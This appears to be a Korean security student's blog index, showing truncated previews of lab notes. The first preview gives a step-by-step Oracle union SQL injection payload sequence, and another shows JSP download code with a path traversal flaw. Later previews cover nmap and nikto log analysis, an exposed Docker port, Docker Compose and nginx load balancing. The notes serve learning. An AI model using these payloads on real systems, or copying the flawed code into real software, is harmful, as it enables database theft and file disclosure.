작은 메모장

~ Union ~=== JSP ===컬럼 갯수 확인Q: 삼성동%' order by 1--Q: 삼성동%' union select 'a', 'b', 'c', 'd', 'e' from dual --자료형 : 문자 문자 문자 문자 문자테이블 이름 추출Q: 삼성동%' union select table_name, null, null, null, null from user_tables --행 이름 추출Q: 삼성동%' union select column_name, null, null, null, null from all_tab_columns where table_name = 'SQL_UNION_ANSWER' --값 추출 Q: 삼성동%' union select ANSWER_COLUMN, null, null, null, ..

String fileName = request.getParameter ("P"); BufferedInputStream bis = null; BufferedOutputStream bos = null; FileInputStream fis = null;try { response.setHeader("Content-Disposition", "attachment;filename="+fileName+";");...fis = new FileInputStream ("C:/datas/"+fileName); bis = new BufferedInputStream(fis);bos = new BufferedOutputStream(response.getOutputStream());정/오탐 판별 1- 취약점: 디렉토리 탐색 취약점(..

실습 시작에 앞서, 해당 명령어를 입력한다. NetworkMiner를 설치하기 위함이다.사실 요즘에는 Wireshark가 상당히 유행이지만, 여기서만 제공하는 기능도 있어 이것만 사용하는 사람도 있다.sudo apt updatesudo apt install mono-develwget https://www.netresec.com/?download=NetworkMiner -O /tmp/NetworkMiner.zipsudo unzip /tmp/NetworkMiner.zip -d /opt/cd /opt/NetworkMiner*sudo chmod +x NetworkMiner.exesudo chmod -R go+w AssembledFiles/sudo chmod -R go+w Captures/ 제공하는 샘플 로그 파..

beebox의 IP를 확인한 후, 칼리 리눅스에서 nmap을 돌린다.타겟인 22번 포트, SSH가 열려있는 것을 확인할 수 있다. 그 후, 접속을 시도한다. 그러면 해당 경로에서 로그인을 시도한 흔적을 확인할 수 있다. 웹 로그 또한 이 로그 디렉토리 경로 아래에 쌓인다.칼리 리눅스에서 nikto로 공격을 날려본다. 그럼 이렇게 공격 기록이 남은 것을 확인할 수 있다. 좀 더 가독성을 보기 좋게 하기 위해, 띄어쓰기를 기준으로 원하는 정보만 뽑아본다. 또, 404 응답코드만 분류하여 보기도 해보자. 이 둘을 합치면 상당히 유용한 검색 결과가 나온다. 또 아래와 같이 다양한 명령어로 변형할 수 있다. 해당 파일은 샘플 로그를 제공받아 실험하였다.제공받은 윈도우 7을 실행한다. 제공받은 파일도 두개 파일 서..

제공받은 리눅스 도커 서버를 실행하여 취약점을 진단할 것이다.  Nmap의 기본 기능으로 포트를 스캔해본다.열려있는 포트는 22, 2375, 8000의 3개 8000번 포트는 통상적으로 사용되는 포트는 아니다.때문에 8000번 포트로 직접 접속하면 웹 서비스가 동작하는 것을 확인할 수 있다. 더 많은 정보를 얻기 위해, -sC 옵션을 사용하여 더욱 자세하게 스캔해본다.결과를 분석을 해보자. 아까 확인한 8000번 포트의 아파치 정보를 확인할 수 있다.버전 정보부터, 해당 페이지가 어떤 익스텐션을 사용하여 동작되고 있는지 확인이 가능하다.해당 버전의 취약점을 이용하여 공격을 시도할 수 있다. 2375 포트에 대한 정보도 확인할 수 있다.해당 포트는 외부에서 도커 서비스를 접근할 때 진입하는 포트로, 이 포..

도커 컴포즈도커 컴포즈는 다중 컨테이너 애플리케이션을 관리할 수 있는 실행 도구.여러 개의 독립적인 컨테이너를 함께 묶어서 하나의 구성 요소로 만들어준다.도커 컴포즈를 사용하면 여러 개의 컨테이너를 간편하게 관리할 수 있다. 도커 컴포즈는 YAML(야믈) 파일에 애플리케이션을 정의한다.이 YAML 파일은 애플리케이션의 모든 구성 요소를 포함하고 있으며, 컨테이너, 네트워크, 볼륨, 환경 변수 등을 정의한다.이것을 통해 애플리케이션의 배포 및 관리를 자동화할 수 있다. 도커 컴포즈를 사용하면 컨테이너를 간단하게 관리할 수 있으며, 여러 개의 컨테이너를 함께 묶어서 하나의 구성 요소로 만들어준다. 애플리케이션을 보다 쉽게 관리할 수 있는 장점이 있다.    실습 새 도커 파일을 하나 만들어줄 것이다.아래 내..

꽤 그럴싸한 구축을 실습할 것이다. 외부 IP(윈도우) -> 칼리리눅스 (nginx) -> 도커 웹 (3대)의 구성으로 구축할 예정이다.nginx는 로드벨런싱을 당연히 진행한다. 일단 도커로 웹 서비스 3개를 생성한다. 마운트도 같이 해준다. 그리고 각각의 마운트 된 폴더 안에 index용 html을 각각 생성해준다. 혹시모를 apache가 있을수도 있으니, 서비스 중지 후 update를 진행한다. 이후, 로컬에 nginx를 설치, 서비스를 실행한다. nginx의 설정파일을 수정할 것이다.http에 있는 모든 내용을 주석처리 하고, 아래의 내용을 새로 입력한다. 서비스를 재시작하면, 메인 주소로 로드벨런싱이 되는 것을 확인할 수 있다. 가중치 또한 설정할 수 있다. 각 서버마다 weight값을 주는 것으..

모놀리식 아키텍처이해전통적인 아키텍처로, 기존에 사용하던 서비스 방법이다.서비스가 하나의 애플리케이션으로 돌아가는 구조로, 기존의 개발 방식을 사용해 개발하여 간단히 배포가 가능하다.하나의 서비스 또는 애플리케이션이 하나의 거대한 아키텍처로 이해되며, 다양한 기능을 동작하는 서비스를 서버에서 실행하여 서비스한다. 단점서비스와 애플리케이션이 모두 묶여있으므로, 서비스를 스케일링하려면 이 아키텍처를 전부 복사해야한다.즉, 기존의 애플리케이션을 그대로 복제하여 로드밸런싱을 해야한다는 것.이 방식은 불필요한 서비스까지 모두 복제된다는 단점이 존재한다. 두 번째 단점은 종속관계의 라이브러리끼리 충돌하는 문제가 있다.각각의 라이브러리는 서로 다른 기능을 제공하며, 특정 버전을 요구하는 경우가 있다.만약 생각없이 업..